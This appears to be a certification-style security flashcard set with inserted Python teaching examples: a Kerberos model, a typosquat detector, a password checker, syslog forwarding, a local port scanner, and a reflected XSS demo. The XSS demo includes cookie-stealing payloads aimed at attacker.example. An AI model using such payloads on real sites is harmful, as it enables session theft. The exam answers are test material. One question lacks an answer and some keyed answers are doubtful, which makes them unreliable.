You are the network administrator of a small nonprofit organization. Currently, an employee named Craig Jenkins handles all help desk calls for the organization. In recent months, the volume of help desk calls has exceeded what Craig can manage alone, so an additional help desk employee has been hired to carry some of the load. Currently, permissions to network resources are assigned directly to Craig's user object. Because the new employee needs exactly the same level of access, you decide to simply copy Craig's Active Directory domain user object and rename it with the new employee's name. Will this strategy work?

No. Permissions are not copied when a user account is copied.

A security administrator needs to run a vulnerability scan that will analyze a system from the perspective of a hacker attacking the organization from the outside. What type of scan should he use?

Non-credentialed scan

Which of the following can make passwords useless on a router?

Not controlling physical access to the router

Which of the following identifies standards and XML formats for reporting and analyzing system vulnerabilities?

OVAL

What is another term for the type of login credentials provided by a token device?

One time password

You install a new Linux distribution on a server in your network. The distribution includes an SMTP daemon that is enabled by default when the system boots. The SMTP daemon does not require authentication to send email messages. Which type of email attack is this server susceptible to?

Open SMTP relay

What type of password is maryhadalittlelamb?

Pass phrase

A security administrator is conducting a penetration test on a network. She connects a notebook system to a mirror port on a network switch. She then uses a packet sniffer to monitor network traffic to try to determine which operating systems are running on network hosts. Which process did the administrator use in the penetration test in this scenario?

Passive fingerprinting

Which of the following is the most common form of authentication?

Password

Which of the following is most vulnerable to a brute force attack?

Password authentication

What common design feature among Instant Messaging clients makes them more insecure than other means of communicating over the Internet?

Peer-to-peer networking

Which of the following uses hacking techniques to proactively discover internal vulnerabilities?

Penetration testing

You suspect that your Web server has been the target of a denial of service attack. You would like to view information about the number of connections to the server over the past three days. Which log would you most likely examine?

Performance

Properly configured passive IDS and system audit logs are an integral part of a comprehensive security plan. Which step must be taken to ensure that the information is useful in maintaining a secure environment?

Periodic reviews must be conducted to detect malicious activity or policy violations.

Users in your organization receive email messages informing them that suspicious activity has been detected on their bank accounts. They are directed to click a link in the email to verify their online banking user name and password. The URL in the link is in the .ru top-level DNS domain. What kind of attack has occurred?

Phishing

As you browse the Internet, you notice that when you go to some sites, multiple additional windows are opened automatically. Many of these windows contain advertisements for products that are inappropriate for your family to view. Which tool can you implement to prevent these windows from showing?

Pop-up blocker

You manage a network that uses a single switch. All ports within your building connect through the single switch. In the lobby of your building are three RJ-45 ports connected to the switch. You want to make sure that visitors cannot plug their computers into the free network jacks and connect to the network. However, employees who plug into those same jacks should be able to connect to the network. What feature should you configure?

Port authentication

You want to make sure that a set of servers will only accept traffic for specific network services. You have verified that the servers are only running the necessary services, but you also want to make sure that the servers will not accept packets sent to other services. Which tool should you use?

Port scanner

Instant messaging does not provide which of the following?

Privacy

A relatively new employee in the data entry cubicle farm was assigned a user account similar to the other data entry employees' accounts. However, audit logs have shown that this user account has been used to change ACLs on several confidential files and has accessed data in restricted areas. This situation indicates which of the following has occurred?

Privilege escalation

An attacker has obtained the logon credentials for a regular user on your network. Which type of security threat exists if this user account is used to perform administrative functions?

Privilege escalation

You decide to use a packet sniffer to identify the type of traffic sent to a router. You run the packet sniffing software on a device, which is connected to the same hub that is connected to the router. When you run the software, you only see frames addressed to the workstation, not to other devices. Which feature should you configure?

Promiscuous mode

What does hashing of log files provide?

Proof that the files have not been altered.

Which of the following is an advantage of a virtual browser?

Protects the host operating system from malicious downloads.

You have recently reconfigured FTP to require encryption of both passwords and data transfers. You would like to check network traffic to verify that all FTP passwords and data are encrypted. Which tool should you use?

Protocol analyzer

You want to identify traffic that is generated and sent through the network by a specific application running on a device. Which tool should you use?

Protocol analyzer

Match each description on the left with the appropriate cloud technology on the right.
• Public cloud
• Private cloud
• Community cloud
• Hybrid cloud

• Public cloud: Provides cloud services to just about anyone.
• Private cloud: Provides cloud services to a single organization.
• Community cloud: Allows cloud services to be shared by several organizations.
• Hybrid cloud: Integrates one cloud service with other cloud services.

Which of the following data destruction techniques uses a punch press or hammer system to crush a hard drive?

Pulverizing

You have implemented an access control method that only allows users who are managers to access specific data. Which type of access control model is used?

RBAC

A router access control list uses information in a packet such as the destination IP address and port number to make allow or deny forwarding decisions. This is an example of which kind of access control model?

RSBAC

Which of the following password attacks uses preconfigured matrices of hashed dictionary words?

Rainbow table

Which phase or step of a security assessment is a passive activity?

Reconnaissance

Children's Online Privacy Protection Act (COPPA)

Requires organizations that provide online services designed for children below the age of 13 to obtain parental consent prior to collecting a child's personal information.

You want to use a tool to scan a system for vulnerabilities, including open ports, running services, and missing patches. Which tools should you use? (Select two.)

Retina. Nessus.

Which access control model manages rights and permissions based on job descriptions and responsibilities?

Role-based access control (RBAC)

Which of the following is undetectable software that allows administrator-level access?

Rootkit

You have heard about a new malware program that presents itself to users as a virus scanner. When users run this software, it installs itself as a hidden program that has admin-level access to various operating system components. The program then tracks system activity and allows an attacker to remotely gain admin access to this computer. Which of the following terms best describes this software?

Rootkit

Which of the following is an example of Rule Based Access Control (RBAC)?

Router access control lists that allow or deny traffic based on the characteristics of an IP packet

You have a development machine that contains sensitive information relative to your business. You are concerned that spyware and malware might be installed while users browse websites, which could compromise your system or pose a confidentiality risk. Which of the following actions would best protect your system?

Run the browser within a virtual environment.

You have run a vulnerability scanning tool and identified several patches that need to be applied to a system. What should you do next after applying the patches?

Run the vulnerability assessment again

Which of the following activities are typically associated with penetration testing? (Select two.)

Running a port scanner. Attempting social engineering.

You want to use a protocol for encrypting emails that uses a PKI with X.509 certificates. Which method should you choose?

S/MIME

Which of the following mechanisms can you use to add encryption to email? (Select two.)

S/MIME. PGP.

You want to use Kerberos to protect LDAP authentication. What authentication mode should you use?

SASL

Which of the following is a disadvantage of software-defined networking (SDN)?

SDN standards are still being developed

You have a website that accepts input from users for creating customer accounts. Input on the form is passed to a database server where the user account information is stored. An attacker is able to insert database commands in the input fields and have those commands execute on the server. Which type of attack has occurred?

SQL injection

Which of the following network services or protocols uses TCP/IP port 22?

SSH

FTPS uses which mechanism to provide security for authentication and data transfer?

SSL

You have installed anti-virus software on the computers on your network. You update the definition and engine files and configure the software to update those files every day. What else should you do to protect your systems from malware? (Select two.)

Schedule regular full system scans. Educate users about malware.

What is the primary distinguishing characteristic between a worm and a logic bomb?

Self-replication.

Lori Redford, who has been a member of the Project Management group, was recently promoted to manager of the team. She has been added as a member of the Managers group. Several days after being promoted, Lori needs to have performance reviews with the team she manages, but she cannot access the performance management system. As a member of the Managers group, she should have the Allow permission to access this system. What is most likely preventing her from accessing this system?

She is still a member of the Project Management group, which has been denied permission to this system. Deny permissions always override Allow permissions.

Your organization's security policy specifies that any mobile device that connects to your internal network must have Remote Wipe enabled, regardless of ownership. If the device is lost or stolen, then it must be wiped to remove any sensitive data from it. Your organization recently purchased several Windows RT tablets. What should you do?

Sign up for a Windows Intune account to manage the tablets.

Which IDS method searches for intrusion or attack attempts by recognizing patterns or identities listed in a database?

Signature based

What type of attack is most likely to succeed against communications between Instant Messaging clients?

Sniffing

Network engineers have the option of using software to configure and intelligently control the network rather than relying on the individual static configuration files that are located on each network device. Which of the following is a relatively new technology that allows network and security professionals to use software to manage, control, and make changes to a network?

Software-defined networking

Match the authentication factor types on the left with the appropriate authentication factor on the right. Each authentication factor type can be used more than once.

PIN: Something You Know
Smart card: Something You Have
Password: Something You Know
Retina scan: Something You Are
Fingerprint scan: Something You Are
Hardware token: Something You Have
Pass phrase: Something You Know
Voice recognition: Something You Are
Wi-Fi triangulation: Somewhere You Are
Typing behaviors: Something You Do

An attacker sends an unwanted and unsolicited email message to multiple recipients with an attachment that contains malware. What kind of attack has occurred in this scenario?

Spam

Which of the following could easily result in a denial of service attack if the victimized system had too little free storage capacity?

Spam

If an SMTP server is not properly and securely configured, it can be hijacked and used maliciously as an SMTP relay agent. Which activity could result if this happens?

Spamming

Which type of malicious activity can be described as numerous unwanted and unsolicited email messages sent to a wide range of victims?

Spamming

You manage a network that uses multiple switches. You want to provide multiple paths between switches so that if one link goes down, an alternate path is available. What feature should your switch support?

Spanning Tree

Which of the following solutions would you implement to eliminate switching loops?

Spanning tree

You manage a single subnet with three switches. The switches are connected to provide redundant paths between the switches.Which feature prevents switching loops and ensures there is only a single active path between any two switches?

Spanning tree

California Database Security Breach Act

Specifies that any agency, person, government entity, or company that does business in California must inform California residents within 48 hours if a database breach or other security breach occurs in which personal information has been stolen or is believed to have been stolen.

Match each bring your own device (BYOD) security concern on the right with a possible remedy on the left. Each remedy may be used once, more than once, or not at all.

Users take pictures of proprietary processes and procedures: Specify where and when mobile devices can be possessed in your acceptable use policy.
Devices with a data plan can email stolen data: Specify where and when mobile devices can be possessed in your acceptable use policy.
Devices have no PIN or password configured: Enroll devices in a mobile device management system.
Anti-malware software is not installed: Implement a network access control (NAC) solution.
A device containing sensitive data may be lost: Enroll devices in a mobile device management system.

Which type of virus conceals its presence by intercepting system requests and altering service outputs?

Stealth.

A virtual LAN can be created using which of the following?

Switch

When configuring VLANs on a switch, what is used to identify which VLAN a device belongs to?

Switch port

Which of the following is a standard for sending log messages to a central logging server?

Syslog

Over the past few days, a server has gone offline and rebooted automatically several times. You would like to see a record of when each of these restarts occurred. Which Windows event log should you check?

System

Which of the following protocols can be used to centralize remote access authentication?

TACACS

Encryption is what type of access control?

Technical

What is the primary purpose of penetration testing?

Test the effectiveness of your security perimeter

You have recently experienced a security incident with one of your servers. After some research, you determine that hotfix #568994, which was recently released, would have protected the server. Which of the following recommendations should you follow when applying the hotfix?

Test the hotfix and then apply it to all servers.

Arrange the Group Policy objects (GPOs) in the order in which they are applied.

1. The Local Group Policy on the computer.
2. GPOs linked to the domain that contains the user or computer object.
3. GPOs linked to the organizational unit that contains the object.

If a user's BYOD device, such as a tablet or phone, is infected with malware, that malware can spread if the user connects to your organization's network. One way to prevent this is to use a network access control (NAC) system. How does a NAC protect your network from being infected by a BYOD device?

The NAC remediates devices before allowing them to connect to your network.

Software-defined networking (SDN) uses a controller to manage the devices. The controller is able to inventory hardware components in the network, gather network statistics, make routing decisions based on gathered data, and facilitate communication between devices from different vendors. It can also be used to make widespread configuration changes from just one device. Which of the following best describes an SDN controller?

The SDN controller is software

Which of the following is a snap-in that allows you to apply a template or compare a template to the existing security settings on your computer?

The Security Configuration and Analysis snap-in

You have opted to use software-defined networking (SDN) to manage, control, and make changes to your network. You want to be able to use software to configure and intelligently control the network, rather than relying on the individual static configuration files that are located on each network device. SDN consists of three layers:
- Application layer
- Control layer
- Physical layer
Which of the following describes what the SDN control layer does to the networking devices that comprise the physical layer?

The control layer removes the control plane from networking devices and creates a single control plane.

Which of the following advantages can single sign-on (SSO) provide? (Select two.)

The elimination of multiple user accounts and passwords for each individual. Access to all authorized resources with a single instance of authentication.

Which of the following defines the crossover error rate for evaluating biometric systems?

The point where the number of false positives matches the number of false negatives in a biometric system.

Which of the following describes the worst possible action by an IDS?

The system identified harmful traffic as harmless and allowed it to pass without generating any alerts.

Drag each penetration test characteristic on the left to the appropriate penetration test name on the right.

White box test: The tester has detailed information about the target system prior to starting the test.
Grey box test: The tester has the same amount of information that would be available to a typical insider in the organization.
Black box test: The tester has no prior knowledge of the target system.
Single blind test: Either the tester has prior knowledge about the target system, or the administrator knows that the test is being performed.
Double blind test: The tester does not have prior information about the system, and the administrator has no knowledge that the test is being performed.

Which of the following best describes an audit daemon?

The trusted utility that runs a background process whenever auditing is enabled.

Which of the following is not true regarding cookies?

They operate within a security sandbox

When using Kerberos authentication, which of the following terms is used to describe the token that verifies the identity of the user to the target system?

Ticket

Which of the following are required when implementing Kerberos for authentication and authorization? (Select two.)

Ticket granting server Time synchronization

A user has just authenticated using Kerberos. What object is issued to the user immediately following login?

Ticket granting ticket

Which of the following are requirements to deploy Kerberos on a network? (Select two.)

Time synchronization between devices A centralized database of users and passwords.
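
The four Kerberos cards above (ticket, ticket granting server, ticket granting ticket, time synchronization and a central principal database), as one added example that is not part of the course material. It models the message flow: the client proves its password by opening the AS reply, receives a TGT at login, then presents the TGT plus a timestamped authenticator to the TGS for a service ticket. Tickets are HMAC-sealed JSON rather than encrypted and the realm, principals and passwords are constructed, so treat it as a model of the exchange, not a Kerberos implementation. The skew check is what fails when the client's clock is wrong.

```python
# Added example (not from the course material): toy Kerberos AS -> TGS -> service flow.
# Sealing is HMAC-SHA256 over JSON, a stand-in for real ticket encryption.
import base64
import hashlib
import hmac
import json
import secrets
import time

CLOCK_SKEW_LIMIT = 300        # seconds; the customary 5-minute Kerberos tolerance
TICKET_LIFETIME = 8 * 3600    # seconds


class KerberosError(Exception):
    pass


def _seal(key: bytes, payload: dict) -> str:
    body = json.dumps(payload, sort_keys=True).encode()
    tag = hmac.new(key, body, hashlib.sha256).digest()
    return base64.b64encode(tag + body).decode()


def _unseal(key: bytes, token: str) -> dict:
    """Reject anything not sealed under key; a wrong password fails here."""
    raw = base64.b64decode(token)
    tag, body = raw[:32], raw[32:]
    if not hmac.compare_digest(tag, hmac.new(key, body, hashlib.sha256).digest()):
        raise KerberosError("integrity check failed")
    return json.loads(body)


def _derive_key(password: str, realm: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), realm.encode(), 10_000)


class KDC:
    """Authentication Server (AS) and Ticket Granting Server (TGS) in one object,
    backed by the centralized database of principals and their keys."""

    def __init__(self, realm: str, principals: dict):
        self.realm = realm
        self.keys = {name: _derive_key(pw, realm) for name, pw in principals.items()}
        self.tgs_key = secrets.token_bytes(32)   # known only to the TGS

    def as_exchange(self, client: str, now: float) -> str:
        """AS_REQ/AS_REP: a TGT (sealed for the TGS) plus a session key only the
        holder of the client's long-term key can open."""
        if client not in self.keys:
            raise KerberosError("unknown principal")
        session = secrets.token_hex(32)
        tgt = _seal(self.tgs_key, {"client": client, "session": session,
                                   "expires": now + TICKET_LIFETIME})
        return _seal(self.keys[client], {"session": session, "tgt": tgt})

    def tgs_exchange(self, tgt: str, authenticator: str, service: str, now: float) -> str:
        """TGS_REQ/TGS_REP: validate TGT and a fresh authenticator, issue a service ticket."""
        tgt_body = _unseal(self.tgs_key, tgt)
        if now > tgt_body["expires"]:
            raise KerberosError("TGT expired")
        session = bytes.fromhex(tgt_body["session"])
        auth = _unseal(session, authenticator)
        if auth["client"] != tgt_body["client"]:
            raise KerberosError("authenticator does not match TGT")
        if abs(now - auth["timestamp"]) > CLOCK_SKEW_LIMIT:
            raise KerberosError("clock skew too great")     # replay defence needs synced clocks
        if service not in self.keys:
            raise KerberosError("unknown service")
        svc_session = secrets.token_hex(32)
        ticket = _seal(self.keys[service], {"client": tgt_body["client"],
                                            "session": svc_session,
                                            "expires": now + TICKET_LIFETIME})
        return _seal(session, {"session": svc_session, "ticket": ticket})


def login_and_access(kdc: KDC, user: str, password: str, service: str,
                     clock_offset: float = 0.0) -> str:
    """Client side of the flow; clock_offset models a client clock that differs
    from the KDC's. Returns 'ok' or the reason the KDC refused."""
    try:
        key = _derive_key(password, kdc.realm)
        kdc_now = time.time()
        as_rep = _unseal(key, kdc.as_exchange(user, kdc_now))      # TGT issued at login
        session = bytes.fromhex(as_rep["session"])
        authenticator = _seal(session, {"client": user, "timestamp": kdc_now + clock_offset})
        tgs_rep = _unseal(session, kdc.tgs_exchange(as_rep["tgt"], authenticator, service, kdc_now))
        # The service validates the ticket with its own long-term key (its keytab)
        # and never has to contact the KDC.
        ticket = _unseal(kdc.keys[service], tgs_rep["ticket"])
        return "ok" if ticket["client"] == user else "ticket issued for another client"
    except KerberosError as exc:
        return str(exc)
```

A wrong password never reaches the KDC as a failed login: the AS reply simply cannot be opened, which is also why Kerberos pre-authentication matters in real deployments (without it, anyone can request that reply and crack it offline).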

A honeypot is used for which purpose?

To delay intruders in order to gather auditing data.

Which of the following is not a form of biometric?

Token device

If your anti-virus software does not detect and remove a virus, what should you try first?

Update your virus detection software.

Which is a program that appears to be a legitimate application, utility, game, or screensaver and performs malicious activities surreptitiously?

Trojan Horse

When configuring VLANs on a switch, what type of switch ports are members of all VLANs defined on the switch?

Trunk ports

Which of the following is stronger than any biometric authentication factor?

Two-factor authentication

Recently, a website named www.vidshare.com has become extremely popular with users around the world. An attacker registers the following domain names:
- www.videoshare.com
- www.vidshar.com
- www.visshare.com
Each of these URLs points to a phishing website that tricks users into supplying their vidshare.com user names and passwords. What type of attack has occurred in this scenario?

Typosquatting
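
Detecting registrations like the three above, as an added example that is not part of the course material: compare the registrable label of each newly seen domain with the brand's label by Levenshtein distance and flag anything within two edits. The domain feed is constructed (the question's three lookalikes plus controls); the suffix handling assumes a single-label public suffix such as .com.

```python
# Added example (not from the course material): edit-distance screening for
# typosquatted lookalikes of a brand domain.
def levenshtein(a: str, b: str) -> int:
    """Minimum single-character insertions, deletions and substitutions turning a into b."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete ca
                           cur[j - 1] + 1,              # insert cb
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]


def registrable_label(domain: str) -> str:
    """'www.videoshare.com' -> 'videoshare'. Assumes a single-label public suffix;
    a real tool would consult the Public Suffix List for co.uk and friends."""
    labels = domain.lower().strip(".").split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def typosquat_candidates(legit: str, observed, max_distance: int = 2) -> list:
    """(domain, distance) for observed domains whose label is a near miss of legit's."""
    target = registrable_label(legit)
    hits = []
    for domain in observed:
        label = registrable_label(domain)
        if label == target:
            continue          # the brand itself, or one of its own subdomains
        dist = levenshtein(target, label)
        if dist <= max_distance:
            hits.append((domain, dist))
    return hits


OBSERVED = [  # constructed feed of newly registered domains
    "www.vidshare.com", "www.videoshare.com", "www.vidshar.com",
    "www.visshare.com", "www.vidshare-login.com", "www.example.org",
]
```

Edit distance catches omissions, insertions and neighbouring-key substitutions; it does not catch "combosquats" such as vidshare-login.com (distance 6 here), which need a substring or keyword rule, nor homoglyph attacks using lookalike Unicode characters, which need confusable-character normalization first.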

You want to use a vulnerability scanner to check a system for known security risks. What should you do first?

Update the scanner definition files

You have just installed a new network-based IDS system that uses signature recognition. What should you do on a regular basis?

Update the signature files

Match the IT audit activity on the left with the appropriate description on the right.

Usage auditing: Documents incidents for security violations and incident response.
Risk evaluation: Identifies inefficient IT strategies, such as weak policies and procedures.
User access and rights review: Verifies the appropriate use of accounts and privileges.
Privilege auditing: Checks user/group rights and privileges to identify cases of creeping privileges.
Escalation auditing: Determines whether privilege-granting processes are appropriate and whether computer use and escalation processes are in place and working.

You've just deployed a new Cisco router that connects several network segments in your organization. The router is physically located in a locked server closet. You use an FTP client to regularly back up the router configuration to a remote server in an encrypted file. You access the router configuration interface from a notebook computer that is connected to the router's console port. You've configured the device with the user name admin01 and the password P@ssW0rd. You have used the MD5 hashing algorithm to protect the password. What should you do to increase the security of this device?

Use SCP to back up the router configuration to a remote location.

Your LDAP directory services solution uses simple authentication. What should you always do when using a simple authentication?

Use SSL

You've just deployed a new Cisco router that connects several network segments in your organization. The router is physically located in a server room that requires an ID card to gain access. You've backed up the router configuration to a remote location in an encrypted file. You access the router configuration interface from your notebook computer by connecting it to the console port on the router. You configured the management interface with a user name of admin and a password of password. What should you do to increase the security of this device?

Use a stronger administrative password

A user named Bob Smith has been assigned a new desktop workstation to complete his day-to-day work. When provisioning Bob's user account in your organization's domain, you assigned an account name of BSmith with an initial password of bw2Fs3d. On first login, Bob is prompted to change his password, so he changes it to the name of his dog (Fido). What should you do to increase the security of Bob's account? (Select two.)

Use group policy to require strong passwords on user accounts. Train users not to use passwords that are easy to guess.
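
What "require strong passwords" checks at the point of change, as an added example that is not part of the course material. The rules are modelled on the Windows password-complexity policy (at least three of four character classes, a minimum length of 7, and no account name or name part longer than two characters inside the password) plus a small constructed blocklist; the blocklist and the minimum length are assumptions, not values from the question. Run against Bob's two passwords it accepts the provisioned one and rejects "Fido" three times over.

```python
# Added example (not from the course material): password policy checks of the
# kind a domain password policy enforces when a user changes their password.
import re

BLOCKLIST = {"password", "fido", "letmein", "123456", "qwerty", "welcome"}  # constructed

CLASSES = {
    "uppercase": r"[A-Z]",
    "lowercase": r"[a-z]",
    "digit": r"[0-9]",
    "symbol": r"[^A-Za-z0-9]",
}


def check_password(password: str, account_name: str, full_name: str = "",
                   min_length: int = 7) -> list:
    """Return the list of policy violations; an empty list means the password passes."""
    problems = []
    if len(password) < min_length:
        problems.append(f"shorter than {min_length} characters")
    present = [name for name, pat in CLASSES.items() if re.search(pat, password)]
    if len(present) < 3:
        problems.append(f"only {len(present)} of 4 character classes ({', '.join(present) or 'none'})")
    if password.lower() in BLOCKLIST:
        problems.append("appears on the blocklist of common passwords")
    # Account name, and each part of the full name longer than two characters,
    # must not appear anywhere in the password (case-insensitive).
    parts = [account_name] + [p for p in re.split(r"[\s,.\-_#]+", full_name) if len(p) > 2]
    for part in parts:
        if part and part.lower() in password.lower():
            problems.append(f"contains part of the user's name ({part})")
    return problems
```

The second recommended action, user training, is what stops the next choice from being "Fido1!": complexity rules alone accept it.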

You are concerned that an attacker can gain access to your Web server, make modifications to the system, and alter the log files to hide his actions. Which of the following actions would best protect the log files?

Use syslog to send log entries to another server.
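
Shipping a log entry off the host as the answer recommends, as an added example that is not part of the course material. It uses Python's standard SysLogHandler to send one event to a collector over UDP; the collector here is a throwaway listener on loopback standing in for the real central log server, and the event text is constructed. The function returns the wire-format line the collector stored so you can see the priority prefix the server will parse.

```python
# Added example (not from the course material): send an event to a remote syslog
# collector so a later compromise of the web server cannot erase it.
import logging
import logging.handlers
import socket
import threading


def start_collector(host: str = "127.0.0.1", timeout: float = 5.0):
    """Constructed stand-in for the central log server: bind an ephemeral UDP
    port and capture one datagram in a background thread."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((host, 0))
    sock.settimeout(timeout)
    received = []

    def serve():
        try:
            data, _peer = sock.recvfrom(4096)
            received.append(data)
        except socket.timeout:
            pass
        finally:
            sock.close()

    thread = threading.Thread(target=serve, daemon=True)
    thread.start()
    return sock.getsockname()[1], received, thread


def ship_event(port: int, message: str, host: str = "127.0.0.1") -> None:
    """Emit one WARNING to the auth facility, as a host-side agent would."""
    handler = logging.handlers.SysLogHandler(
        address=(host, port), facility=logging.handlers.SysLogHandler.LOG_AUTH)
    handler.setFormatter(logging.Formatter("%(name)s[%(process)d]: %(message)s"))
    logger = logging.getLogger("webserver.audit")
    logger.setLevel(logging.INFO)
    logger.propagate = False
    logger.addHandler(handler)
    try:
        logger.warning(message)
    finally:
        logger.removeHandler(handler)
        handler.close()


def demo() -> str:
    """Return what the collector received, e.g. '<36>webserver.audit[4242]: ...'.
    <36> is facility auth (4) * 8 + severity warning (4)."""
    port, received, thread = start_collector()
    ship_event(port, "failed password for root from 203.0.113.5 port 52211")
    thread.join(5)
    return received[0].rstrip(b"\x00").decode() if received else ""
```

Plain UDP syslog is unauthenticated and lossy; on a production network use TCP with TLS (SysLogHandler accepts socktype=socket.SOCK_STREAM, and rsyslog or syslog-ng terminate TLS), and make the collector write-only from the sending hosts so the attacker cannot follow the logs to their new home.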

Which security mechanism uses a unique list that meets the following specifications?
- The list is embedded directly in the object itself.
- The list defines which subjects have access to certain objects.
- The list specifies the level or type of access allowed to certain objects.

User ACL

User Education and Awareness Policy

User Education and Awareness Training

Which of the following information is typically not included in an access token?

User account password

Your organization has started receiving phishing emails. You suspect that an attacker is attempting to find an employee workstation they can compromise. You know that a workstation can be used as a pivot point to gain access to more sensitive systems. Which of the following is the most important aspect of maintaining network security against this type of attack?

User education and training

You are creating a new Active Directory domain user account for the Rachel McGaffey user account. During the account setup process, you assigned a password to the new account. However, you know that the system administrator should not know any user's password for security reasons. Only the user should know his or her own password-no one else. Click the option you would use in the New Object - User dialog to remedy this situation.

User must change password at next login

Which of the following describes Privilege auditing?

Users' and groups' rights and privileges are checked to guard against creeping privileges.

You can use a variety of methods to manage the configuration of a network router. Match the management option on the right with its corresponding description on the left. (Each option can be used more than once.)

SSL: Uses public-key cryptography
HTTP: Transfers data in cleartext
SSH: Uses public-key cryptography
Telnet: Transfers data in cleartext
Console port: Cannot be sniffed

You run a small network for your business that has a single router connected to the Internet and a single switch. You keep sensitive documents on a computer that you would like to keep isolated from the other computers on the network. Other hosts on the network should not be able to communicate with this computer through the switch, but you still need to access the network from the computer. What should you implement?

VLAN

Your company is a small start-up company that has leased office in a building shared by other businesses. All businesses share a common network infrastructure. A single switch connects all devices in the building to the router that provides Internet access. You would like to make sure that your computers are isolated from computers used by other companies. Which feature should you request to have implemented?

VLAN

You manage a network that uses a single switch. All ports within your building connect through the single switch.In the lobby of your building are three RJ-45 ports connected to the switch. You want to allow visitors to plug into these ports to gain Internet Access, but they should not have access to any other devices on your private network. Employees connected throughout the rest of your building should have both private and Internet access.Which feature should you implement?

VLANs

Which of the following devices facilitates communication between different virtual machines by checking data packets before moving them to a destination?

Virtual Switch

You want to be able to identify the services running on a set of servers on your network. Which tool would best give you the information you need?

Vulnerability scanner

What is the main difference between vulnerability scanning and penetration testing?

Vulnerability scanning is performed within the security perimeter; penetration testing is performed outside of the security perimeter.

Which of the following tools can you use on a Windows network to automatically distribute and install software and operating system patches on workstations? (Select two.)

WSUS Group Policy

Which of the following describes a false positive when using an IPS device?

Legitimate traffic being flagged as malicious.

Which of the following devices is capable of detecting and responding to security threats?

Intrusion prevention system (IPS)

Which of the following devices is computer software, firmware, or hardware that creates and runs virtual machines?

Hypervisor

Which of the following functions can a port scanner provide? (Select two.)

Which of the following is the type of port scan that does not complete the full three-way TCP handshake, but rather listens only for the SYN/ACK or RST response?

TCP SYN scan
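
A port scanner's two jobs, finding open ports and identifying the service behind them, as an added example that is not part of the course material. It performs a TCP connect() scan (what nmap -sT does: the full handshake, so it shows up in the target's logs) and then grabs the banner from whatever answered. The target is a constructed listener on loopback that imitates an SSH server's greeting. A SYN scan (nmap -sS) instead sends a raw SYN and classifies the reply, SYN/ACK as open and RST as closed, without completing the handshake; that needs raw-socket privileges and is deliberately not shown here.

```python
# Added example (not from the course material): TCP connect() scan plus banner grab
# against a constructed loopback target.
import socket
import threading
from concurrent.futures import ThreadPoolExecutor


def tcp_connect_scan(host: str, ports, timeout: float = 0.5) -> list:
    """Ports on which connect() completes the three-way handshake (connect_ex == 0)."""
    def probe(port):
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            return port if s.connect_ex((host, port)) == 0 else None
    with ThreadPoolExecutor(max_workers=32) as pool:
        return sorted(p for p in pool.map(probe, ports) if p is not None)


def banner_grab(host: str, port: int, timeout: float = 2.0) -> str:
    """Read whatever the service volunteers on connect; SSH, SMTP and FTP all announce themselves."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return s.recv(128).decode(errors="replace").strip()


class FakeSshService:
    """Constructed target: accepts connections and sends an SSH-style banner until stopped."""
    BANNER = b"SSH-2.0-OpenSSH_9.6\r\n"

    def __init__(self, host: str = "127.0.0.1"):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.bind((host, 0))            # ephemeral port, so the scan window is chosen at run time
        self.sock.listen(8)
        self.sock.settimeout(0.2)
        self.port = self.sock.getsockname()[1]
        self.stop = threading.Event()
        threading.Thread(target=self._serve, daemon=True).start()

    def _serve(self):
        while not self.stop.is_set():
            try:
                conn, _ = self.sock.accept()
            except socket.timeout:
                continue
            with conn:
                try:
                    conn.sendall(self.BANNER)
                except OSError:
                    pass      # the scanner hangs up right after connect(); that is expected
        self.sock.close()

    def close(self):
        self.stop.set()


def demo() -> tuple:
    """Scan a small window around the listener; returns (listener_port, open_ports, banner)."""
    svc = FakeSshService()
    try:
        window = range(svc.port - 3, svc.port + 4)
        open_ports = tcp_connect_scan("127.0.0.1", window)
        banner = banner_grab("127.0.0.1", svc.port)
    finally:
        svc.close()
    return svc.port, open_ports, banner
```

The banner is how scanners and vulnerability scanners turn "port 22 open" into "OpenSSH 9.6", which is also why hardening guides tell you to trim or remove version strings where the protocol allows it.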

You want to use a tool to see packets on a network, including the source and destination of each packet.Which tool should you use?

Wireshark

Which of the following is an example of a decentralized privilege management solution?

Workgroup

Which of the following is an attack that injects malicious scripts into Web pages to redirect users to fake websites or gather personal information?

XSS
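
The reflected XSS pattern beside its fix, as an added example that is not part of the course material. The "page" is a constructed template for a search results view that reflects the q parameter into both an attribute and the body; the two attacker payloads are constructed too. A small HTMLParser-based audit counts script elements and on* event handlers in what each renderer produces, which is the difference an attacker's browser would see.

```python
# Added example (not from the course material): reflected XSS in a search page,
# then the same page with output encoding, audited by parsing the result.
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlencode


def search_term(query_string: str) -> str:
    return parse_qs(query_string).get("q", [""])[0]


def render_vulnerable(query_string: str) -> str:
    """Reflects user input straight into an attribute and into the body."""
    term = search_term(query_string)
    return f'<input name="q" value="{term}"><p>Results for {term}</p>'


def render_safe(query_string: str) -> str:
    """Same page with HTML output encoding; escape() quotes both < > & and the
    quote characters (quote=True is the default), which covers the attribute context."""
    term = escape(search_term(query_string), quote=True)
    return f'<input name="q" value="{term}"><p>Results for {term}</p>'


class ScriptAudit(HTMLParser):
    """Counts <script> elements and on* event-handler attributes in rendered markup."""
    def __init__(self):
        super().__init__()
        self.scripts = 0
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts += 1
        self.handlers += [name for name, _ in attrs if name.startswith("on")]


def audit(html: str) -> dict:
    parser = ScriptAudit()
    parser.feed(html)
    parser.close()
    return {"scripts": parser.scripts, "handlers": parser.handlers}


# Constructed payloads: one for the text context, one that breaks out of the attribute.
BODY_PAYLOAD = urlencode({"q": "<script>new Image().src='https://attacker.example/c?'+document.cookie</script>"})
ATTRIBUTE_PAYLOAD = urlencode({"q": '" autofocus onfocus="fetch(\'https://attacker.example/c?\'+document.cookie)'})
```

Encode at output time for the context you are writing into (HTML body, attribute, JavaScript string, URL), not at input time; a Content-Security-Policy header that forbids inline script is the defence-in-depth layer behind it.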

